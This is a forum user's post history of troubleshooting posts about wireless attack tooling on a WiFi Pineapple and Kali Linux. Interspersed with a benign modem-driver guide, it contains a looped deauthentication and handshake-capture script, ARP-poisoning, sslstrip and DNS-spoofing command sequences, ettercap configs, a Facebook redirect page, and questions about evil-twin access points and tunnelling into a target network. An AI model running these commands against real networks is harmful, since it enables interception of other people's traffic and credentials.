GarrettVD
-
Posts
13 -
Joined
-
Last visited
-
Days Won
1
Posts posted by GarrettVD
-
-
That's all true man but where I'm having the issue is with capturing the intial 4-way handshake.
-
Yeah logging to /usb/ which is just a USB stick mounted via fstab
Checking for handshakes in Wireshark using the .cap file, filtering with filter "eapol"
-
Isnt that pretty much the same thing?
-
I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools, in order to capture a 4-way WPA handshake.
The first issue was that, depite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (ie. not targeted to a specific client MAC) deauth's every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1)
So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared under in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm.
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,
Using the
#!/bin/bash
airmon-ng stop wlan1mon; \
ifconfig wlan1 down; \
ifconfig wlan0 down; \
macchanger -r wlan1; \
ifconfig wlan1 up; \
airmon-ng start wlan1 1; \
airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \
while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; done
I'm attaching a screenshot of the probe responses and deauthentication packets.
Any help would be great!
Thanks,Screenshot #1 - Mass Deauthentication
Screenshot #2 - Targeting HonHai___
-
I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targetted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.
I am using a combination of the following:
- SSLStrip
- Ettercap (with the dns_spoof plugin enabled).
- urlsnarf
- Wireshark (for examining post-test PCAP results)
The commands I perform are as follows:iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain sslstrip -p -k -w /root/sslstrip.log iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 urlsnarf -i wlan0 | grep http > /root/session.txt # 192.168.2.1 = router, 192.168.2.130 = Macbook Air echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/ ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/ # This runs for a while,I then stop manually... and then clean up and examine results in Wireshark wireshark & killall sslstrip killall python killall urlsnarf iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain etterlog -p -i /root/session.eci
I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari), a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; just resolves the domain as it should. (see my /etc/ettercap/etter.dns configuration below).
I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534). . . [privs] ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default . . . # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" . . .
Alternatively, for a simple dnsspoof, I've tried a simple combination of arpsoof + dnsspoof. Doesn't work either. :(
echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1 dnsspoof -i wlan0 -f /root/hosts.txt
I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...
Any help would be greatly appreciated.
Thanks,############################################################################
# #
# ettercap -- etter.dns -- host file for dns_spoof plugin #
# #
# Copyright © ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# #
# Sample hosts file for dns_spoof plugin #
# #
# the format is (for A query): #
# www.myhostname.com A 168.11.22.33 #
# *.foo.com A 168.44.55.66 #
# #
# ... for a AAAA query (same hostname allowed): #
# www.myhostname.com AAAA 2001:db8::1 #
# *.foo.com AAAA 2001:db8::2 #
# #
# or to skip a protocol family (useful with dual-stack): #
# www.hotmail.com AAAA :: #
# www.yahoo.com A 0.0.0.0 #
# #
# or for PTR query: #
# www.bar.com PTR 10.0.0.10 #
# www.google.com PTR ::1 #
# #
# or for MX query (either IPv4 or IPv6): #
# domain.com MX xxx.xxx.xxx.xxx #
# domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx #
# domain3.com MX xxxx:xxxx::y #
# #
# or for WINS query: #
# workgroup WINS 127.0.0.1 #
# PC* WINS 127.0.0.1 #
# #
# or for SRV query (either IPv4 or IPv6): #
# service._tcp|_udp.domain SRV 192.168.1.10:port #
# service._tcp|_udp.domain SRV [2001:db8::3]:port #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the www.microsoft.com example) #
# #
############################################################################
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 198.182.2.23
*.microsoft.com A 198.182.2.23
www.microsoft.com PTR 198.182.2.23
foo.com A 198.168.2.23
*.foo.com A 198.168.2.23
www.foo.com PTR 198.168.2.23 # Wildcards in PTR are not allowed
##########################################
# no one out there can have our domains...
#
www.alor.org A 127.0.0.1
www.naga.org A 127.0.0.1
www.naga.org AAAA 2001:db8::2
##########################################
# dual stack enabled hosts does not make life easy
# force them back to single stack
www.ietf.org A 127.0.0.1
www.ietf.org AAAA ::
www.example.org A 0.0.0.0
www.example.org AAAA ::1
###############################################
# one day we will have our ettercap.org domain
#
www.ettercap.org A 127.0.0.1
www.ettercap-project.org A 127.0.0.1
ettercap.sourceforge.net A 216.136.171.201
www.ettercap.org PTR ::1
###############################################
# some MX examples
#
alor.org MX 127.0.0.1
naga.org MX 127.0.0.1
example.org MX 127.0.0.2
microsoft.com MX 2001:db8::1ce:c01d:bee3
###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#
LAB-PC* WINS 127.0.0.1
###############################################
# some service discovery examples
xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389
# vim:ts=8:noexpandtab[############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright © ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# #
############################################################################
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
[mitm]
arp_storm_delay = 10 # seconds
arp_poison_warm_up = 1 # seconds
arp_poison_delay = 10 # seconds
arp_poison_icmp = 1 # boolean
arp_poison_reply = 1 # boolean
arp_poison_request = 0 # boolean
arp_poison_equal_mac = 1 # boolean
dhcp_lease_time = 1800 # seconds
port_steal_delay = 10 # seconds
port_steal_send_delay = 2000 # microseconds
[connections]
connection_timeout = 300 # seconds
connection_idle = 5 # seconds
connection_buffer = 10000 # bytes
connect_timeout = 5 # seconds
[stats]
sampling_rate = 50 # number of packets
[misc]
close_on_eof = 1 # boolean value
store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote
aggressive_dissectors = 1 # boolean value
skip_forwarded_pcks = 1 # boolean value
checksum_check = 0 # boolean value
submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints)
checksum_warning = 0 # boolean value (valid only if checksum_check is 1)
############################################################################
#
# You can specify what DISSECTORS are to be enabled or not...
#
# e.g.: ftp = 21 enabled on port 21 (tcp is implicit)
# ftp = 2345 enabled on non standard port
# ftp = 21,453 enabled on port 21 and 453
# ftp = 0 disabled
#
# NOTE: some dissectors have multiple default ports, if you specify a new
# one, all the default ports will be overwritten
#
#
#dissector default port
[dissectors]
ftp = 21 # tcp 21
ssh = 22 # tcp 22
telnet = 23 # tcp 23
smtp = 25 # tcp 25
dns = 53 # udp 53
dhcp = 67 # udp 68
http = 80 # tcp 80
ospf = 89 # ip 89 (IPPROTO 0x59)
pop3 = 110 # tcp 110
#portmap = 111 # tcp / udp
vrrp = 112 # ip 112 (IPPROTO 0x70)
nntp = 119 # tcp 119
smb = 139,445 # tcp 139 445
imap = 143,220 # tcp 143 220
snmp = 161 # udp 161
bgp = 179 # tcp 179
ldap = 389 # tcp 389
https = 443 # tcp 443
ssmtp = 465 # tcp 465
rlogin = 512,513 # tcp 512 513
rip = 520 # udp 520
nntps = 563 # tcp 563
ldaps = 636 # tcp 636
telnets = 992 # tcp 992
imaps = 993 # tcp 993
ircs = 994 # tcp 993
pop3s = 995 # tcp 995
socks = 1080 # tcp 1080
radius = 1645,1646 # udp 1645 1646
msn = 1863 # tcp 1863
cvs = 2401 # tcp 2401
mysql = 3306 # tcp 3306
icq = 5190 # tcp 5190
ymsg = 5050 # tcp 5050
mdns = 5353 # udp 5353
vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
gg = 8074 # tcp 8074
proxy = 8080 # tcp 8080
rcon = 27015,27960 # udp 27015 27960
ppp = 34827 # special case ;) this is the Net Layer code
TN3270 = 23,992 # tcp 23 992
#
# you can change the colors of the curses GUI.
# here is a list of values:
# 0 Black 4 Blue
# 1 Red 5 Magenta
# 2 Green 6 Cyan
# 3 Yellow 7 White
#
[curses]
color_bg = 0
color_fg = 7
color_join1 = 2
color_join2 = 4
color_border = 7
color_title = 3
color_focus = 6
color_menu_bg = 4
color_menu_fg = 6
color_window_bg = 4
color_window_fg = 7
color_selection_bg = 6
color_selection_fg = 6
color_error_bg = 1
color_error_fg = 3
color_error_border = 3
#
# This section includes all the configurations that needs a string as a
# parmeter such as the redirect command for SSL mitm attack.
#
[strings]
# the default encoding to be used for the UTF-8 visualization
utf8_encoding = "ISO-8859-1"
# the command used by the remote_browser plugin
remote_browser = "xdg-open http://%host%url"
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#---------------
# Mac Os X
#---------------
# quick and dirty way:
#redir_command_on = "ipfw add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
#redir_command_off = "ipfw -q delete set %set"
# a better solution is to use a script that keeps track of the rules interted
# and then deletes them on exit:
# redir_command_on:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
# else
# ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
# redir_command_off:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
# rm -f /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
#---------------
# Open BSD
#---------------
# unfortunately the pfctl command does not accepts direct rules adding
# you have to use a script wich executed the following command:
# ----- cut here -------
# #!/bin/sh
# rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -
# ----- cut here -------
# it's important to remember that you need "rdr-anchor sslsniff" in your
# pf.conf in the TRANSLATION section.
#redir_command_on = "the_script_described_above %iface %port %rport"
#redir_command_off = "pfctl -a sslsniff -Fn"
# also, if you create a group called "pfusers" and have EC_GID be that group,
# you can do something like:
# chgrp pfusers /dev/pf
# chmod g+rw /dev/pf
# such that all users in "pfusers" can run pfctl commands; thus allowing non-root
# execution of redir commands.
##########
# EOF #
########## -
I ended up just modifying the iptables manually.
iptables -t nat -A PREROUTING -i br-lan -p tcp -d foo.com -j DNAT --to 172.16.42.1
echo 1 > /proc/sys/net/ipv4/ip_forward -
I was able to get the Sierra Wireless Aircard 330u to work on my Mark V; assuming the 320u is not far off. The driver is unfortunately not included by default in the factory Mark V firmware image. Luckily, the Makefile for the sierra_net module is included in the firmware source bundle and has already been adapted to use OpenWrt's Makefile syntax. It is located in the /package/sierra-directip/ directory of the Mark V source bundle. You gotta compile it though. Hope you've access to a Linux machine!
Is your device modeswitching, or appearing at all when you issue an lsusb?
If it is and you'd like to get more detail about its connection status / what band its locking onto, you can issue some AT commands to it via picocom (or some other means). Just add "src/gz attitude_adjustment http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages" to your /opkg/opkg.conf, and then run "opkg install picocom"...
#install picocom opkg install picocom picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3 #swap 0 with whatever your command port is #run picocom, then issue a AT!GSTATUS? root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3 picocom v1.7 port is : /dev/ttyUSB3 flowcontrol : none baudrate is : 9600 parity is : none databits are : 8 escape is : C-a local echo is : no noinit is : no noreset is : yes nolock is : no send_cmd is : sz -vv receive_cmd is : rz -vv imap is : omap is : emap is : crcrlf,delbs, FATAL: cannot lock /dev/ttyUSB3: File exists root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB ttyUSB0 ttyUSB1 ttyUSB2 ttyUSB3 ttyUSB4 ttyUSB5 root@Pineapple:~# ifdown wwan root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3 picocom v1.7 port is : /dev/ttyUSB3 flowcontrol : none baudrate is : 9600 parity is : none databits are : 8 escape is : C-a local echo is : no noinit is : no noreset is : yes nolock is : no send_cmd is : sz -vv receive_cmd is : rz -vv imap is : omap is : emap is : crcrlf,delbs, Terminal ready AT!GSTATUS? !GSTATUS: Current Time: 7019 Temperature: 29 Bootup Time: 1 Mode: ONLINE System mode: WCDMA PS state: Attached WCDMA band: WCDMA 850 WCDMA channel: 1037 GMM (PS) state:REGISTERED NORMAL SERVICE MM (CS) state: IDLE NORMAL SERVICE WCDMA L1 State:L1M_PCH_SLEEP RRC State: DISCONNECTED RX level C0: -86 LAC: DBEC (56300) RX level C1: -106 Cell ID: ---omitted-- OK
... so this tells me that its locking onto the WCDMA 850 channel... aka 3G.
To get the thing to work, here is more or less what I did.
Grab the source from... http://wiki.wifipineapple.com/uploads/source.tar.gz
Follow the guide here to set up your environment for cross-compilation, set compilation target to linux-ar71xx_generic, etc...
Before you build, do a double-check of the .config file in the base directory of the source-code bundle, to ensure that the line "# CONFIG_PACKAGE_kmod-usb-net-sierrawireless=is not set" has been replaced with "CONFIG_PACKAGE_kmod-usb-net-sierrawireless=y".
Issue the "make" command in the base directory of the source-code bundle.
After some time, the build should complete and file will be located at {source code root}/build_dir/linux-ar71xx_generic/linux-3.3.8/drivers/net/usb/sierra_net.ko
Copy that file by whatever means is preferable, to /lib/modules/sierra_net.ko on your Pineapple. So using scp for example...
scp {source code root}/build_dir/linux-ar71xx_generic/linux-3.3.8/drivers/net/usb/sierra_net.ko root@172.16.41.1:/lib/module/sierra_net.ko
On your PIneapple, add "sierra_net" on a new line in the /etc/modules.d/61-usb-serial-wwan, below "usb_wwan".
Create a symlink to that file from /etc/modules-boot.d/61-usb-serial-wwan.
ln -s /etc/modules.d/61-usb-serial-wwan /etc/modules-boot.d/61-user-serial-wwan
Add this to your /etc/config/network file on the Pineapple:
config interface 'wwan' option proto '3g' option device '/dev/ttyUSB3' #swap with the path to the command port of your card... option apn 'lteinternet.apn' #swap with your APN option service 'umts'
Note that I set the service to UMTS above... My card is locking to the
Then just do ifup wwan... Should show up as something like "3g-wwan" in your ifconfig output.
-
Or rather, danke.
-
Yeah I managed to do just like you said Cooper, and it works fine that way. Thanks.
-
I'll preface this by saying yes, I have searched the forums in-depth for a working solution. The DNSSpoof functionality on my factory-flashed v1.4.1 firmware Mark V simple does not function
I've configured the Mark V to host an access point on wlan0, to which I've connected with my iPhone. My Mark V is connected to my machine running Kali Linux via an ethernet cable. The Mark V has internet access provided via the wwan0 Sierra Wireless LTE modem on host maching (not the Pineapple as there don't appear to be supporting drivers). The clients of my AP on wlan0 have complete internet access this way, and I am able to browse just fine through my iPhone.
But the DNSSpoof configuration simply doesn't work out-of-the-box.
I've searched the /etc/pineapple/spoofhost and there are no extraneous ^M characters, as suggested in other threads.
I've executed the dnsspoof command directly as suggested by Darren. When attempting to browse to facebook.com, the output is as follows.
root@Pineapple:/www# dnsspoof -i br-lan -f /etc/pineapple/spoofhost
dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1]
172.16.42.144.57622 > 172.16.42.1.53: 1791+ A? star.c10r.facebook.com
172.16.42.144.49996 > 172.16.42.1.53: 62932+ A? channel-proxy-07-ash2.facebook.com
172.16.42.144.61799 > 172.16.42.1.53: 26997+ A? webdav.facebook.comifconfig output from the Pineapple, configured with my AP on wlan0:
br-lan Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21746 errors:0 dropped:8 overruns:0 frame:0
TX packets:9669 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6718537 (6.4 MiB) TX bytes:3575839 (3.4 MiB)
eth0 Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:16654 errors:0 dropped:8 overruns:0 frame:0
TX packets:15500 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7020808 (6.6 MiB) TX bytes:4583345 (4.3 MiB)
Interrupt:4
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1454 errors:0 dropped:0 overruns:0 frame:0
TX packets:1454 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:106768 (104.2 KiB) TX bytes:106768 (104.2 KiB)
wlan0 Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7070 errors:0 dropped:0 overruns:0 frame:0
TX packets:7064 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1203614 (1.1 MiB) TX bytes:4837933 (4.6 MiB)My /etc/pineapple/spoofhost file:
172.16.42.1 *.facebook.com
172.16.42.1 facebook.com
After much mucking-around, I've settled on this for the /www/redirect.php file contents:
<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "facebook")){ header('Location: facebook.html'); }
require('index.html');
?>iPhone Wi-Fi settings once connected are as follows:
IP: 172.16.42.144
Subnet Mask: 255.255.255.0
Router: 172.16.42.1
DNS: 172.16.42.1
Search Domains: lan
I just have no idea why this doesn't work.
-
Scenario: I have a WPA2-secured wireless network of which I know the password. Is it possible (with the Pineapple or via some other method) to connect mimic the MAC address, security, password of the target AP while performing a deauthentication attack on said router, in order to have network devices on the target AP's network automatically connect to my "cloned" AP? I understand that this works for open wireless network, just wondering if it will work (and if there is support for this) on secured-wireless networks? In this sense, I could run ettercap etc. on my cloned AP device, where I would not be able to had I simply connected to the target AP as client.
-
Hoping someone can help me out with this. My ideal setup with the Pineapple MK5 would look like this:
[ Target AP ] <----> [ Pineapple ] <-- connected via a VPN, SSH relay, etc... --> [ Remote machine running Kali + Metasploit ]
Basically what I'd like to do is access the target AP (a WPA2-secured network of which I have the psk) with the Pineapple on wlan1 in Client mode, and route the network connection back to my remote machine running Kali Linux + metasploit, be it through a reverse SSH connection, VPN connection, etc, in order to access network devices on the Target AP.
I currently am able to reverse-SSH via a relay server I set up on Amazon EC2, but I am unsure of how to share the network connection of the target AP to my machine running Kali... Any ideas?
What is the most practical way to connect to the Target AP and share that network?
Share wireless Internet connection from Pineapple to PC
in WiFi Pineapple Mark V
Posted
What I'd like to do, as the title suggests is share the Internet connection I've established on the Realtek card of the Pineapple (wlan1 I believe) TO my PC running Ubuntu, either through the Pineapple's eth0 or wlan0 interfaces. How can I do this?
Thanks,